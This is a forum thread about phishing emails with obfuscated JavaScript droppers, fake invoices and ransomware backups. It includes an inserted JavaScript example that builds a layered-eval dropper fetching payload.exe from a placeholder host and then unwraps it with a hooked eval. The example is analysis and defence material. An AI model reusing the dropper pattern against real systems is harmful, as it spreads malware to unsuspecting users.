I could send you a few - well, could if I wasn't anon. Oh well.
Let me tell you, from what I've dissected from every single one of them, they go through about 1 or 2 levels of obfuscation of the code (eval'ing one segment to run another segment that eval's a third), plus a bunch of weird function calls (like calling one function to get a bit of a string, calling another that evals it and returns the result, calling a third to get another piece and multiply it by 5, then calling yet another to take all those pieces as arguments and return a concatenated string of substrings - that kind of stuff). Ultimately what resolves/results is a URL that is then queried using an XMLHttpRequest object (aka AJAX), or something similar - that goes out to some server (identified by IP or some domain), grabs an EXE, saves it, and executes it.
It's obvious from all the layers of obfuscation that the code is made this way - likely by some kind of "trojan generator" (which can probably be easily found on the dark web or elsewhere) - to both get by filters for trojans, as well as make it difficult for most people to decipher what is going on if they see the code. Ultimately, none of this is very interesting or unique - it's all a well known form of attack and documented.
Generally, though, that IP/domain has already been disabled, or the EXE has been deleted or wiped, at least in most of the cases I have tried. Only on a very few occasions have I been able to download the executable. In those cases, I try to alert the owner of the IP or domain if I can do a whois or reverse DNS search to know what provider I am dealing with - then I'll send an email to the admin contact or wherever.
I find it funny, though, when I get these emails - I always try to figure them out, hoping someday that what I'll download is a bash script or something similar; you see, my main workstation has been a linux box of one form or another since 1995 or so - and I keep hoping that these guys move on to doing things targeting Macs, Linux, or some other *nix platform, but it hasn't happened yet.
Even if it did run, the worst thing that will happen is that I have to re-image from a backup of my system - big whoop. The upside will be that I will know for certain that the "year of linux on the desktop" has finally arrived, and that linux has "jumped the shark", and I need to move to another obscure platform (maybe BSD? lolz) just to stay ahead of the game.
I'm not holding my breath on that, though - and for that, I am thankful!
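As an added illustration of the layered-eval droppers described in the post above (this is not code from the thread and not a real sample from any of those emails): a constructed, harmless three-layer sample is built in code, then peeled apart with a hooked eval. The sample URL uses the reserved example.invalid domain, the helper names p/e/m/r are made up, and the stand-in XMLHttpRequest only records what was requested and never connects. The hook is an unwrapping trick, not a sandbox: the layers still execute with the rights of the Node process, and direct-eval access to the caller's local variables is not emulated, so run it only against samples on a throwaway VM.

```javascript
// Added example, not code from the thread. Builds a constructed (benign) eval
// dropper and extracts its layers and the URL it would fetch, without running
// the real eval or touching the network.

// --- Constructed sample, assembled programmatically so every layer is visible ---
// Innermost layer: p() returns string fragments, e() evals a fragment and
// returns the result, m() multiplies a number by 5, and r() glues the pieces
// into a URL that is then requested through XMLHttpRequest.
const INNER = [
  "function p(i){var a=['\"ht\"','\"tp://\"','\"ex\"','\"ample.in\"','\"valid/\"','\"pay\"','\"load.exe\"'];return a[i];}",
  "function e(s){return eval(s);}",
  "function m(n){return n*5;}",
  "function r(){var s='';for(var i=0;i<m(1)+2;i++){s+=e(p(i));}return s;}",
  "var x=new XMLHttpRequest();x.open('GET',r(),false);x.send();",
].join('\n');
// Each outer layer only evals the next one (JSON.stringify yields a valid JS string literal).
const MIDDLE = 'eval(' + JSON.stringify(INNER) + ');';
const SAMPLE = 'eval(' + JSON.stringify(MIDDLE) + ');';

// --- Analyst side: peel the layers by hooking eval and the network sink ---
function analyse(code, maxDepth = 8) {
  const layers = [];    // every string handed to eval, with its nesting depth
  const requests = [];  // every URL the sample tried to fetch

  // Stand-in for XMLHttpRequest: records the request, never connects.
  function FakeXHR() {}
  FakeXHR.prototype.open = function (method, url) {
    requests.push({ method: String(method), url: String(url) });
  };
  FakeXHR.prototype.setRequestHeader = function () {};
  FakeXHR.prototype.send = function () {};

  function run(src, depth) {
    if (depth > maxDepth) throw new Error('eval nesting deeper than ' + maxDepth);
    layers.push({ depth, code: src });
    // Whatever the layer passes to eval lands here instead of the real eval.
    const hookedEval = (next) => (typeof next === 'string' ? run(next, depth + 1) : next);
    // Naming the parameters eval/XMLHttpRequest shadows the globals, so the
    // layer's own calls resolve to our stand-ins (sloppy-mode bodies allow
    // 'eval' as a parameter name). Real eval returns the completion value of
    // an expression, so try the expression form first and fall back to plain
    // statements when the string does not parse as one.
    let fn;
    try {
      fn = new Function('eval', 'XMLHttpRequest', 'return (' + src + '\n);');
    } catch (err) {
      if (!(err instanceof SyntaxError)) throw err;
      fn = new Function('eval', 'XMLHttpRequest', src);
    }
    return fn(hookedEval, FakeXHR);
  }

  run(code, 0);
  return { layers, requests };
}

// Summarise the findings as one line per layer plus the sinks reached.
function report(result) {
  const lines = result.layers.map((l) => 'depth ' + l.depth + ': ' + l.code.slice(0, 60));
  result.requests.forEach((q) => lines.push('REQUEST ' + q.method + ' ' + q.url));
  return lines.join('\n');
}

console.log(report(analyse(SAMPLE)));
```

The seven short fragment evals show up as their own depth-3 entries, which is exactly the noise the "call a function that evals it and returns the result" trick is meant to create; the one line that matters is the recorded GET for the assembled URL. Other sinks these scripts use (ActiveXObject, WScript.Shell) would be stubbed the same way, as extra shadowed parameters.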
For the last month I've also seen a massive increase in these emails and I now also get several a day. Most are easily seen as fakes but some are actually scarily good. Not good enough to convince me to open the attachment, but I'm sure many will be. Some emails appear to be copies of actual invoice emails sent from the alleged source company so everything checks out, the contact numbers, the "from address" and it looks legit. I also feel sorry for the companies that are being spoofed as I saw the rise of these emails on the BBC and they say that the companies being spoofed are being inundated with calls from angry people asking why they are chasing invoices for things they didn't order.
Oh yes, I forgot about the fake invoices. I get those too.
Get me coffee and no one gets hurt!
And the fake tax refunds, had one that looked very much like an HMRC mail, but they don't send attachments.
HMRC definitely don't send attachments with refunds, that's for sure.
I may not last forever but the mess I leave behind certainly will.
Usually I don't - I mean, I receive a lot of those e-mails but they are egregiously filtered by the Big G spam filter and end up in the Spam folder. I rarely receive spam or phishing between the good e-mails.
GCS d--- s-/++ a- C++++ U+++ P- L- E-- W++ N++ o+ K- w+++ O? M-- V? PS+ PE- Y+ PGP t++ 5? X R++ tv-- b+ DI+++ D++ G e++>+++ h--- ++>+++ y+++* Weapons extension: ma- k++ F+2 X
If you think 'goto' is evil, try writing an Assembly program without JMP. -- TNCaver
Just under 5% of the emails I get are junk: adverts, spam, phishing, and such like - nearly all of which I never see because it goes straight to my "junk mail" folder via the Live Mail rules I have set up. Every now and then I go through and forward phishing mails to the supposed originator.
But so far I've not seen anything like you describe.
I still do regular-and-often backups though!
Bad command or file name. Bad, bad command! Sit! Stay! Staaaay...
Quote: I still do regular-and-often backups though! That's the secret to survive Ransomware, isn't it?
Get me coffee and no one gets hurt!
Probably!
I find that if you have a backup, you probably won't need it. If you don't...
Bad command or file name. Bad, bad command! Sit! Stay! Staaaay...
Quote: if you have a backup, you probably won't need it Yup! And having full backups takes fear out of the equation, doesn't it? Knowing you can recover from an attack gives you peace of mind, even if it never happens.
Get me coffee and no one gets hurt!
Some of the latest viruses put out by the NSA implant themselves into the firmware of hard drives or bios, so that the machine is ruined. You cannot do a restore and expect to be rid of the virus.
I get a few dozen of these every day.
"Past due bill"
"Invoice Payment"
"Fax sent"
etc, etc...
".45 ACP - because shooting twice is just silly" - JSOP, 2010
- You can never have too much ammo - unless you're swimming, or on fire. - JSOP, 2010
- When you pry the gun from my cold dead hands, be careful - the barrel will be very hot. - JSOP, 2013
I only get these via one of my email accounts - the one with a bcs.org address. I would have hoped that the BCS (British Computer Society) would have been sufficiently computer savvy to host their emails on a server with decent spam filters.
Don't worry. Letting windows update own your computer and rule your life will solve all your problems.
Oh, wait...
No it won't. It'll just "fix" things that work.
The best process security and peace of mind is, and has always been, "don't do anything stupid".
If you use Outlook (the MS Office version), one trick is to drop suspect files into the "Junk E-mail" folder before opening them. That disables anything that could do a nasty.
But I prefer the "If in doubt, delete" method. Failing to open a genuine e-mail will not add or remove a second to or from your lifespan.
I wanna be a eunuchs developer! Pass me a bread knife!
Quote: But I prefer the "If in doubt, delete" method. Precisely! Same here. But maintaining good backups does not hurt. Ransom viruses are also spread by hacked "good" websites. There is always the risk of visiting a supposedly safe website that has been hacked.
Get me coffee and no one gets hurt!
Cornelius Henning wrote: Ransom viruses are also spread by hacked "good" websites.
This is the exact reason why I typically use Firefox with NoScript and AdBlockPlus (extended with my own personal filters). It has made the internet a pretty spartan place and there are some websites that don't even load anymore but I consider any website that will not fulfill its basic purpose without scripts or linking to 12 other sites as poor web design and not worth my time (and by basic purpose, I mean displaying information). If I need the full capabilities of a website, I turn on what is needed or switch over to Chrome. The end result is that I have ultimate control of what web content is allowed to run on my PC.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
Quote: It has made the internet a pretty spartan place This is so unnecessary! See this thread:
The Lounge - CodeProject
Especially the item by John Simmons on HOSTS files.
Shameless plug: Also see my article about surviving the Ransom Virus.
If you are properly prepared, you can surf the Internet without fear.
Get me coffee and no one gets hurt!
I am in total agreement with that. All that unnecessary junk steals my bandwidth even if my browser settings block it from being rendered. If I may also play devil's advocate, I also understand that many websites depend on advertisements to supply their operating capital BUT the broad-spectrum tactics that most ad services utilize, showing you a million ads in the hope that you click one, is reliant on quantity and not quality. In my opinion, one or two high-quality, content-targeted ads per page is more than enough. Three dozen ads trying to sell me the latest pharmaceutical product or another product that I have no need for is a waste of money on both ends and does the advertising industry a disservice.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
But why worry?
If your own, personal files (which are a tiny proportion of the files on your PC) and your configuration details for various programs (which don't amount to five beans' worth of disc space) are saved to other locations, then all you lose is an OS -- and I'd be quite happy to lose any OS higher than Win 7.
Just use another machine while the "attacked" one is getting everything reinstalled and copied over, and you haven't lost a peanut.
I wanna be a eunuchs developer! Pass me a bread knife!
Mark,
When I am attacked by Ransomware, it takes me less than 10 minutes to totally recover and clear my computer of the virus. (It has happened 3 times.) If data files are corrupted by the virus, add the time to overwrite the corrupted files from a backup that was disconnected at the time of the attack. Can you beat that? If yes: I would love to hear how!
Get me coffee and no one gets hurt!
Are you backing up to a NAS?
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
Quote: Are you backing up to a NAS? Nooooo!
A Ransom virus will encrypt all files on the network, especially files in servers or a NAS! Look what happened to the hospital in LA, who was forced to pay $17,000 to have files on their network unencrypted. You need to back up to an "air gap" device, that is only briefly connected to the network while the backup is being saved. That applies to backing up data files, as well as system drive images that are vital in case of an attack.
Get me coffee and no one gets hurt!
Air gap backups seem like a lot of trouble for my home since there really isn't much there that I couldn't go without and now they have malware designed to target 'air gapped' computers (Microtrend article). I guess the only way to prevent such attacks is not to become a target.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
Quote: I guess the only way to prevent such attacks is not to become a target Obviously the choice is yours. Good luck
Get me coffee and no one gets hurt!
Unfortunately, C, I can't give you timing data, because I've never been daft enough to get infected in the first place!
[Ambles away, whistling the theme to Goldfinger]
I wanna be a eunuchs developer! Pass me a bread knife!